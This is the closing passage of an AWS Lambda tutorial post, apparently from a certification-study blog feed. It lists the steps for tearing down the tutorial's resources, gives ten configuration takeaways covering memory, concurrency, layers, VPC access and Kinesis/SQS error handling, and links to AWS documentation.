&lt;p&gt;&lt;strong&gt;1.&lt;/strong&gt; &lt;strong&gt;Lambda&lt;/strong&gt; → Delete &lt;code&gt;DataProcessor&lt;/code&gt;, &lt;code&gt;ClickstreamProcessor&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;2.&lt;/strong&gt; &lt;strong&gt;Lambda Layers&lt;/strong&gt; → Delete &lt;code&gt;shared-utils&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;3.&lt;/strong&gt; &lt;strong&gt;Kinesis&lt;/strong&gt; → Delete &lt;code&gt;clickstream&lt;/code&gt; stream&lt;br&gt;
&lt;strong&gt;4.&lt;/strong&gt; &lt;strong&gt;SQS&lt;/strong&gt; → Delete &lt;code&gt;data-processor-dlq&lt;/code&gt;, &lt;code&gt;data-processor-success&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;5.&lt;/strong&gt; &lt;strong&gt;IAM&lt;/strong&gt; → Delete the Lambda execution roles&lt;br&gt;
&lt;strong&gt;6.&lt;/strong&gt; &lt;strong&gt;CloudWatch&lt;/strong&gt; → Delete the log groups&lt;/p&gt;




&lt;h2&gt;
  
  
  Key Takeaways
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Memory = CPU:&lt;/strong&gt; more memory means more CPU. &lt;em&gt;Find the sweet spot where cost and performance balance.&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Initialize outside the handler:&lt;/strong&gt; SDK clients, DB connections, config loading. &lt;em&gt;Reused across warm invocations.&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lambda Destinations &amp;gt; DLQ:&lt;/strong&gt; Destinations capture success AND failure with more context.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ReportBatchItemFailures&lt;/strong&gt; for SQS, &lt;strong&gt;BisectBatchOnFunctionError&lt;/strong&gt; for Kinesis to isolate bad records.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;VPC Lambda loses internet:&lt;/strong&gt; needs NAT Gateway or VPC endpoints for AWS services.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;RDS Proxy&lt;/strong&gt; for Lambda-to-RDS: manages connection pooling.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layers:&lt;/strong&gt; up to 5 per function, 250 MB total unzipped, versioned and immutable.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;15-minute timeout&lt;/strong&gt; is the max: for longer tasks, use Step Functions or ECS.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Provisioned concurrency:&lt;/strong&gt; eliminates cold starts but costs money when idle.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kinesis parallelization factor"&lt;/strong&gt; (1–10) lets you process multiple batches per shard.&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  Additional Resources
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/lambda/latest/dg/welcome.html" rel="noopener noreferrer"&gt;What Is AWS Lambda&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/lambda/latest/dg/with-kinesis.html" rel="noopener noreferrer"&gt;Using Lambda to process records from Amazon Kinesis Data Streams&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/lambda/latest/dg/configuration-function-common.html" rel="noopener noreferrer"&gt;Configuring AWS Lambda functions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/lambda/latest/dg/best-practices.html" rel="noopener noreferrer"&gt;Best practices for working with AWS Lambda functions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/lambda/latest/dg/configuration-concurrency.html" rel="noopener noreferrer"&gt;Configuring reserved concurrency for a function&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;🏗️&lt;/p&gt;

</description>
      <category>aws</category>
      <category>certification</category>
      <category>cloud</category>
      <category>developer</category>
    </item>
  </channel>
</rss>
